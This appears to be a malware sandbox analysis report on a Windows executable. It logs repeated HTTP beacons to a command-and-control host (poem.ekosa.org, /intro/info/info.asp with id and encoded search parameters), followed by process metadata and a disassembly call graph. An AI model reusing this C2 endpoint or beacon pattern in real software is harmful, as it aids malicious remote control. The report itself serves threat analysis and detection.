      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      93192.168.2.449866210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:51.047215939 CET657OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:51.313611031 CET659INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:50 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      94192.168.2.449867210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:51.581322908 CET662OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:51.847165108 CET666INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:51 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      95192.168.2.449868210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:52.114242077 CET668OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:52.375633955 CET671INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:51 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      96192.168.2.449869210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:52.756196976 CET691OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:53.025325060 CET1351INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:52 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      97192.168.2.449875210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:53.292113066 CET4303OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:53.554802895 CET4303INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:52 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      98192.168.2.449876210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:53.823312044 CET4304OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:54.087682962 CET4305INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:53 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      99192.168.2.449877210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:54.462141037 CET4305OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:54.720748901 CET4306INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:53 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      System Behavior

      Analysis Process: WVbU1Gf5p8.exe PID: 6344 Parent PID: 6040

      General

      Start time:17:54:55
      Start date:11/01/2021
      Path:C:\Users\user\Desktop\WVbU1Gf5p8.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\WVbU1Gf5p8.exe'
      Imagebase:0x1230000
      File size:51000 bytes
      MD5 hash:69F7CDE70CC22ACEB5DD32FF1DC3F685
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      Chronological Activities

      Disassembly

      Code Analysis

      Reset < >

        Analysis Process: WVbU1Gf5p8.exe PID: 6344 Parent PID: 6040 WVbU1Gf5p8.exeCOMMON

        Execution Graph

        Execution Coverage:3.6%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:9.7%
        Total number of Nodes:1973
        Total number of Limit Nodes:24

        Graph

        execution_graph 9832 123a1a3 9834 123a1c5 9832->9834 9836 123a1c9 9832->9836 9833 1232550 _ValidateLocalCookies 5 API calls 9835 123a22b 9833->9835 9834->9833 9836->9834 9837 1238289 31 API calls 9836->9837 9837->9836 9470 123d421 9472 123d445 9470->9472 9471 123edd0 9473 123d45a 9472->9473 9476 123d55e 9472->9476 9473->9471 9474 123eea7 21 API calls 9473->9474 9475 123edce 9474->9475 9479 123eea7 9476->9479 9480 123eeb0 9479->9480 9483 123f5f6 9480->9483 9484 123f635 __floor_pentium4 9483->9484 9488 123f6b7 __floor_pentium4 9484->9488 9493 123f9f9 9484->9493 9487 123f6ed 9490 1232550 _ValidateLocalCookies 5 API calls 9487->9490 9492 123f6e1 9488->9492 9496 12354dc 9488->9496 9491 123d56e 9490->9491 9492->9487 9500 123fd0d 9492->9500 9507 123fa1c 9493->9507 9499 1235504 9496->9499 9497 1232550 _ValidateLocalCookies 5 API calls 9498 1235521 9497->9498 9498->9492 9499->9497 9501 123fd1a 9500->9501 9502 123fd2f 9500->9502 9504 123fd34 9501->9504 9505 1236fad __dosmaperr 20 API calls 9501->9505 9503 1236fad __dosmaperr 20 API calls 9502->9503 9503->9504 9504->9487 9506 123fd27 9505->9506 9506->9487 9508 123fa47 __raise_exc 9507->9508 9509 123fc40 RaiseException 9508->9509 9510 123fa17 9509->9510 9510->9488 9643 1232561 9644 1232569 9643->9644 9661 1235dde 9644->9661 9646 1232574 9668 123296b 9646->9668 9648 12325f4 9649 1232c32 ___scrt_fastfail 4 API calls 9648->9649 9651 12325fb ___scrt_initialize_default_local_stdio_options 9649->9651 9650 1232589 __RTC_Initialize 9650->9648 9673 1232b0f 9650->9673 9653 12325a2 9653->9648 9654 12325b3 9653->9654 9676 1232bca RtlInitializeSListHead 9654->9676 9656 12325b8 9677 1232bd6 9656->9677 9658 12325db 9683 1235e78 9658->9683 9660 12325e6 9662 1235e10 9661->9662 9663 1235ded 9661->9663 9662->9646 9663->9662 9664 1236fad __dosmaperr 20 API calls 9663->9664 9665 1235e00 9664->9665 9666 1236cdb _abort 26 API calls 9665->9666 9667 1235e0b 9666->9667 9667->9646 9669 1232979 9668->9669 9672 123297e ___scrt_initialize_onexit_tables 9668->9672 9670 1232c32 ___scrt_fastfail 4 API calls 9669->9670 9669->9672 9671 1232a01 9670->9671 9672->9650 9690 1232ad4 9673->9690 9676->9656 9756 1236433 9677->9756 9679 1232be7 9680 1232bee 9679->9680 9681 1232c32 ___scrt_fastfail 4 API calls 9679->9681 9680->9658 9682 1232bf6 9681->9682 9684 12369c2 _abort 38 API calls 9683->9684 9685 1235e83 9684->9685 9686 1235ebb 9685->9686 9687 1236fad __dosmaperr 20 API calls 9685->9687 9686->9660 9688 1235eb0 9687->9688 9689 1236cdb _abort 26 API calls 9688->9689 9689->9686 9691 1232af1 9690->9691 9692 1232af8 9690->9692 9696 1236287 9691->9696 9699 12362f7 9692->9699 9695 1232af6 9695->9653 9697 12362f7 __onexit 29 API calls 9696->9697 9698 1236299 9697->9698 9698->9695 9702 1235fdf 9699->9702 9705 1235f15 9702->9705 9704 1236003 9704->9695 9706 1235f21 _abort 9705->9706 9713 1239242 RtlEnterCriticalSection 9706->9713 9708 1235f2f 9714 1236146 9708->9714 9710 1235f3c 9724 1235f5a 9710->9724 9712 1235f4d _abort 9712->9704 9713->9708 9715 1236164 9714->9715 9723 123615c __onexit __crt_fast_encode_pointer 9714->9723 9716 12361bd 9715->9716 9715->9723 9727 123a119 9715->9727 9718 123a119 __onexit 29 API calls 9716->9718 9716->9723 9719 12361d3 9718->9719 9721 12364ce ___vcrt_freefls@4 20 API calls 9719->9721 9720 12361b3 9722 12364ce ___vcrt_freefls@4 20 API calls 9720->9722 9721->9723 9722->9716 9723->9710 9755 123928a RtlLeaveCriticalSection 9724->9755 9726 1235f64 9726->9712 9728 123a124 9727->9728 9729 123a14c 9728->9729 9730 123a13d 9728->9730 9731 123a15b 9729->9731 9736 123d18b 9729->9736 9732 1236fad __dosmaperr 20 API calls 9730->9732 9743 123d1be 9731->9743 9735 123a142 ___scrt_get_show_window_mode 9732->9735 9735->9720 9737 123d196 9736->9737 9738 123d1ab RtlSizeHeap 9736->9738 9739 1236fad __dosmaperr 20 API calls 9737->9739 9738->9731 9740 123d19b 9739->9740 9741 1236cdb _abort 26 API calls 9740->9741 9742 123d1a6 9741->9742 9742->9731 9744 123d1d6 9743->9744 9745 123d1cb 9743->9745 9746 123d1de 9744->9746 9753 123d1e7 _abort 9744->9753 9747 1236508 __onexit 21 API calls 9745->9747 9748 12364ce ___vcrt_freefls@4 20 API calls 9746->9748 9751 123d1d3 9747->9751 9748->9751 9749 123d211 RtlReAllocateHeap 9749->9751 9749->9753 9750 123d1ec 9752 1236fad __dosmaperr 20 API calls 9750->9752 9751->9735 9752->9751 9753->9749 9753->9750 9754 123a2c1 _abort 7 API calls 9753->9754 9754->9753 9755->9726 9757 1236451 9756->9757 9759 1236471 9756->9759 9758 1236fad __dosmaperr 20 API calls 9757->9758 9760 1236467 9758->9760 9759->9679 9761 1236cdb _abort 26 API calls 9760->9761 9761->9759 9511 1233220 9522 12331e0 9511->9522 9523 12331f2 9522->9523 9524 12331ff 9522->9524 9525 1232550 _ValidateLocalCookies 5 API calls 9523->9525 9525->9524 9762 123e660 IsProcessorFeaturePresent 9526 1235e26 9527 1235e32 _abort 9526->9527 9528 1235e69 _abort 9527->9528 9534 1239242 RtlEnterCriticalSection 9527->9534 9530 1235e46 9531 123a0c9 __cftof 20 API calls 9530->9531 9532 1235e56 9531->9532 9535 1235e6f 9532->9535 9534->9530 9538 123928a RtlLeaveCriticalSection 9535->9538 9537 1235e76 9537->9528 9538->9537 10270 12387ea 10275 123881f 10270->10275 10273 12364ce ___vcrt_freefls@4 20 API calls 10274 1238806 10273->10274 10276 1238831 10275->10276 10277 12387f8 10275->10277 10278 1238861 10276->10278 10279 1238836 10276->10279 10277->10273 10277->10274 10278->10277 10281 123a119 __onexit 29 API calls 10278->10281 10280 12365f3 _abort 20 API calls 10279->10280 10282 123883f 10280->10282 10283 123887c 10281->10283 10284 12364ce ___vcrt_freefls@4 20 API calls 10282->10284 10285 12364ce ___vcrt_freefls@4 20 API calls 10283->10285 10284->10277 10285->10277 9539 123912e GetCommandLineA GetCommandLineW 9838 12368ad 9839 12368b8 9838->9839 9843 12368c8 9838->9843 9844 12368ce 9839->9844 9842 12364ce ___vcrt_freefls@4 20 API calls 9842->9843 9845 12368e1 9844->9845 9846 12368e7 9844->9846 9848 12364ce ___vcrt_freefls@4 20 API calls 9845->9848 9847 12364ce ___vcrt_freefls@4 20 API calls 9846->9847 9849 12368f3 9847->9849 9848->9846 9850 12364ce ___vcrt_freefls@4 20 API calls 9849->9850 9851 12368fe 9850->9851 9852 12364ce ___vcrt_freefls@4 20 API calls 9851->9852 9853 1236909 9852->9853 9854 12364ce ___vcrt_freefls@4 20 API calls 9853->9854 9855 1236914 9854->9855 9856 12364ce ___vcrt_freefls@4 20 API calls 9855->9856 9857 123691f 9856->9857 9858 12364ce ___vcrt_freefls@4 20 API calls 9857->9858 9859 123692a 9858->9859 9860 12364ce ___vcrt_freefls@4 20 API calls 9859->9860 9861 1236935 9860->9861 9862 12364ce ___vcrt_freefls@4 20 API calls 9861->9862 9863 1236940 9862->9863 9864 12364ce ___vcrt_freefls@4 20 API calls 9863->9864 9865 123694e 9864->9865 9870 1236794 9865->9870 9876 12366a0 9870->9876 9872 12367b8 9873 12367e4 9872->9873 9889 1236701 9873->9889 9875 1236808 9875->9842 9877 12366ac _abort 9876->9877 9884 1239242 RtlEnterCriticalSection 9877->9884 9880 12366b6 9882 12364ce ___vcrt_freefls@4 20 API calls 9880->9882 9883 12366e0 9880->9883 9881 12366ed _abort 9881->9872 9882->9883 9885 12366f5 9883->9885 9884->9880 9888 123928a RtlLeaveCriticalSection 9885->9888 9887 12366ff 9887->9881 9888->9887 9890 123670d _abort 9889->9890 9897 1239242 RtlEnterCriticalSection 9890->9897 9892 1236717 9898 1236977 9892->9898 9894 123672a 9902 1236740 9894->9902 9896 1236738 _abort 9896->9875 9897->9892 9899 1236986 __cftof 9898->9899 9900 12369ad __cftof 9898->9900 9899->9900 9901 1239e05 __cftof 20 API calls 9899->9901 9900->9894 9901->9900 9905 123928a RtlLeaveCriticalSection 9902->9905 9904 123674a 9904->9896 9905->9904 10286 123cff0 10289 123d007 10286->10289 10290 123d015 10289->10290 10291 123d029 10289->10291 10294 1236fad __dosmaperr 20 API calls 10290->10294 10292 123d043 10291->10292 10293 123d031 10291->10293 10298 1234161 __cftof 38 API calls 10292->10298 10300 123d002 10292->10300 10295 1236fad __dosmaperr 20 API calls 10293->10295 10296 123d01a 10294->10296 10297 123d036 10295->10297 10299 1236cdb _abort 26 API calls 10296->10299 10301 1236cdb _abort 26 API calls 10297->10301 10298->10300 10299->10300 10301->10300 9411 1235834 9412 1238d8b 51 API calls 9411->9412 9413 1235846 9412->9413 9422 123917e GetEnvironmentStringsW 9413->9422 9416 1235851 9418 12364ce ___vcrt_freefls@4 20 API calls 9416->9418 9419 1235886 9418->9419 9420 12364ce ___vcrt_freefls@4 20 API calls 